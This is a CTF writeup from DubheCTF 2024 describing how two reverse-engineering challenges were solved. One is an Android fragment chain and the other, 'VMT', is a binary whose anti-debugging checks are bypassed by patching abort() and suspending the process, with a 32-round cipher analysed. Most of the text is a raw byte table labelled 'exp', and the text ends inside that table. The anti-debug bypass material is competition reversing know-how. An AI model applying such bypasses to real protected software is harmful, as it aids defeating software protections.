DubheCTF 2024

UKFC 2024 DubheCTF Writeup

Re

fffffragment

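The main screen has two buttons. Through a chain of method calls it launches another activity, with bundle2 carrying the current data; go into fragmentchang1 to take a look.

Pressing the first/second button triggers the m1/m2 encryption, accumulates the result onto the string obtained in the previous step, and again goes through the call chain into the next fragment. After 256 iterations you reach the final screen that outputs the flag.

Next came the hand-grinding (I think a taint engine should have been used to find the path, but the environment wasn't set up properly), and in the end the flag came out.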

VMT

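Before the input there are four anti-debugging checks: two are handled by patching out the abort() function, and two are bypassed by suspending the process.

An input of length 36 triggers an exception, which changes the original key N0ThisiS4F4k3K3Y to Pyu0Z8#bC5vqUFgt.

The encryption function is at sub_14D5A0. It converts the input string to a hexadecimal string and encrypts it in sub_14CFD0, looping over groups of sixteen and padding with 0xa when a group is short.

The encryption logic is as follows. The hexadecimal string is first split into four groups, then the key above is expanded into an array of length 256, and the four input groups go through 32 rounds of encryption. In each round, the last three strings are XORed together, the result is passed to sub_14B070 for table-lookup encryption followed by further shift encryption, and finally that result is XORed with the first string, after which the four strings are regenerated for the next round.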

exp:

map = [0x44,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x30,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x39,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x45,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x43,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x43,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x32,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x46,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x43,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x35,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x42,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x37,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x41,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x34,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x31,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x36,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x39,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x36,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x36,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x45,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x39,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x37,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x33,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x34,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x42,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x33,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x31,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x41,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x43,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x38,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x38,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x35,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x30,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x41,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x34,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x30,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x37,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x43,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x33,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x33,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x45,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x38,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x34,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x38,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x38,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x42,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x31,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x45,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x30,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x34,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x30,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x36,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x44,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x35,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x44,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x41,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x32,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x32,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x43,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x42,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x31,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x35,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x39,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x44,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x37,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x32,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x43,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x36,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x45,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x42,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x38,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x32,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x30,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x37,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x38,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x36,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x31,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x41,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x30,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x45,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x44,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x34,0x0,0x0,0x0,0x0,0x0,0x0,
